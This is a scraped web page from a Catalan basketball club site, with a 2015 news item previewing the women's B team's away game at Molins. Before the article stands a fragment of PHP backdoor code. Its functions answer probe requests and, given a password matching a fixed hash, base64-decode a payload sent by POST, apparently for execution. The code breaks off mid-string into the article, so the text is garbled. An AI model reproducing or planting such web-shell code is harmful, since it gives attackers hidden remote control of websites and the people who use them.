function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet B visita un rival de la part alta de la classificació, el Molins (demà, 19.15 h) - Tgn Bàsquet Club -

El TGN Bàsquet B visita un rival de la part alta de la classificació, el Molins (demà, 19.15 h)

By
Updated: octubre 24, 2015

El TGN Bàsquet B visita demà diumenge una pista complicada, la del Celtic Bàsquet Molins (19.15 h), un equip que ocupa actualment la tercera posició a la classificació (balanç de 3 victòries i 1 derrota) i que té com a objectiu pujar de categoria.

El conjunt lila, per la seva part, busca sumar el primer triomf de curs que li doni confiança per encarar la resta de la temporada. L’equip que entrena Sergi Farré no ha trobat encara la fórmula del triomf, tot i que ha començat a exhibir estones de molt bon joc en els seus partits. Una prova d’això es va produir en l’última jornada al pavelló del Sagrat Cor. El TGN Bàsquet B va perdre de forma clara contra el Barça Santfeliuenc (30-59) però va ser per culpa d’una molt mala segona meitat perquè, en la primera, les tarragonines havien plantat cara (26-26 al descans). “El resultat de la setmana passada no va mostrar tot el que va passar a la pista, on vam fer coses molt ben fetes. Fa dos partits que estem jugant, en algunes fases dels mateixos, molt bé, ara l’objectiu seria aconseguir regularitat durant els quaranta minuts”, diu l’entrenador Sergi Farré, que no podrà comptar per aquest partit amb Irene Villegas i Sara Martínez.

“Ha estat una setmana complicada d’entrenaments perquè algunes de les jugadores tenen problemes físics, però hem anat de menys a més”, afirma Farré a l’hora que reclama més protagonisme d’alguna de les noies en els moments difícils:  “En moments complicats necessitem un referent ofensiu per no tenir por a fallar, que és un dels problemes que tenim. L’esforç de les jugadores és inqüestionable i aquesta setmana s’ha vist perquè moltes d’elles patien problemes físics i han entrenat al màxim”.

El partit, doncs, es presenta com una gran oportunitat de millora pel sènior B i on hi ha poc a perdre -en el sentit que el Molins és favorit- i molt a guanyar.

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *